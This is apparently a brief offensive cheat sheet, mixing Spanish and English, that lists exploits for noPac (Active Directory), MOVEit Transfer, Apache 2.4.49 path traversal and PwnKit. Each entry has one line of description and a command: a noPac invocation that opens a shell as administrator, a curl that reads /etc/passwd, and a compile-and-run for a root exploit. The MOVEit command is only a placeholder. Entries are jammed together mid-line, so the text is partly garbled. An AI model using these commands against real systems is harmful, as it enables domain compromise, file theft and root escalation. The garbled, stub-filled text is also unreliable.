Afect: Security Account Manager (SAM) & Kerberos Privilege Attribute Certificate (PAC) in ADDS.
NoPac uses many tools in Impacket to communicate with, upload a payload, and issue commands from the attack host to the target DC
------------------------------------------------------------------------------
Running NoPac & Getting a Shell:
sudo python3 noPac.py domain/user:password -dc-ip $IP -dc-host DOMAIN-EX-DC01 -shell --impersonate administrator -use-ldapAfecta: Progress MOVEit Transfer
Exploit de SQL Injection + RCE no autenticado utilizado en ataques masivos por ransomware groups.
curl -X POST https://target.com/moveitapi -d 'exploit_payload_here'Afecta: Apache HTTP Server 2.4.49
Permite leer archivos arbitrarios mediante URL encoding, incluso ejecutar código si tiene permisos de ejecución.
curl http://target/cgi-bin/.%2e/.%2e/.%2e/etc/passwdAfecta: sistemas Linux con `pkexec`
Permite escalada de privilegios a root mediante manipulación de variables de entorno.
gcc pwnkit.c -o pwnkit && ./pwnkit